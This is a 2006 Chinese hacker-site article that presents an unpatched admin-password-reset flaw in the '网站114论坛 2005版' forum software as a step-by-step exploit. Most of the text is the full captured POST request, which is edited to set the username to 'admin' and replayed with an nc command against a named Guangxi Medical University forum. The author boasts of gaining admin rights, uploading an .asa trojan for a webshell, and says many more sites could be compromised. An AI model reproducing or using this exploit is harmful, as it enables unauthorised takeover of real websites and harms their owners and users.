(网站114论坛 2005版正式)漏洞

资源交流吧：VIP

{$Wap}

您现在的位置：九佰度在线九佰度空间 >> 文章中心 >> 黑客前沿 >> 漏洞公告 >> 文章正文

用户登录

新用户注册

(网站114论坛 2005版正式)漏洞

★★★

【字体：小大】

(网站114论坛 2005版正式)漏洞

作者：未知文章来源：来自网络点击数：更新时间：2006-3-16

0
关键字:
"版权所有设计制作：网站114"

漏洞描述:
网站114论坛 2005版正式
/edituserdb.asp
对提交数据和cooikes缺乏验证
导致任意用户可以修改管理员密码
默认后台admin/index.asp

今天在旁注一个机房的机器时用了一下。

http://www.gxmu.net.cn/xzl/BBS/index.asp

广西医科大学网站上的一个论坛。

注册了一个用户33221.

然后跳转到 /edituserdb.asp,单击“修改注册”开始抓包!

用记事本保存抓包内容如下：
-----------------------------------------------------------------------------------------------------------

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.gxmu.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"

先生
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"

11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"

111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"

修改注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

------------------------------------------------------------------------------------------------------------

其中：“
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6
”

修改第一个"33221"为“admin”保存11.txt文本为：

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.gxmu.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"

先生
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"

11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"

111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"

修改注册信息
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

这里因为我注册的用户名33221与admin长度一至，所以这里不用修改字节长度。

然后用nc提交到服务器

nc www.gxmu.net.cn 80 <11.txt

返回提示修改会员资料成功。

然后用admin 密码为申请33221的密码一至登录。

当然就是管理员权限了，然后登录后台，点击“修改栏目”，上传asa木马，ok,拿到webshll。

看了一下，这个论坛系统还没有出补丁，可以拿大批webshell了，不过我只要了对我比较有用的一个服务器，其它的没有去抓了。

还有不清楚的，可以看下动画演示，http://www.ncph.net/soft/114论坛最新漏洞利用动画.rar

垃圾漏洞，这里是弄给菜鸟看的，高人不要骂我。

[1]

文章录入：qq007 责任编辑：qq007

上一篇文章： Macromedia Shockwave Player ActiveX控件溢出漏洞

下一篇文章：乘风多用户计数器v3.7 Cookies注入漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　本类热门文章

	泰航空姐在曼谷新国际机场屡	11-22
	俄罗斯最后一颗军事间谍卫星	11-22
	英国成为欧洲最大性奴交易市	11-22
	朝鲜称将坚决报复日本对其实	11-22
	中情局被指谋杀肯尼迪兄弟	11-22
	布什访问印尼引起大规模抗议	11-22
	东南亚许多儿童成为卖淫活动	11-22
	英国妇女两次怀上三胞胎医学	11-22

　最新推荐文章

	泰航空姐在曼谷新国际机场屡	11-22
	俄罗斯最后一颗军事间谍卫星	11-22
	英国成为欧洲最大性奴交易市	11-22
	朝鲜称将坚决报复日本对其实	11-22
	中情局被指谋杀肯尼迪兄弟	11-22
	布什访问印尼引起大规模抗议	11-22
	东南亚许多儿童成为卖淫活动	11-22
	英国妇女两次怀上三胞胎医学	11-22

　最新文章

	泰航空姐在曼谷新国际机场屡	11-22
	俄罗斯最后一颗军事间谍卫星	11-22
	英国成为欧洲最大性奴交易市	11-22
	朝鲜称将坚决报复日本对其实	11-22
	中情局被指谋杀肯尼迪兄弟	11-22
	布什访问印尼引起大规模抗议	11-22
	东南亚许多儿童成为卖淫活动	11-22
	英国妇女两次怀上三胞胎医学	11-22

　文章评论（评论内容只代表网友观点，与本站立场无关！）【发表评论】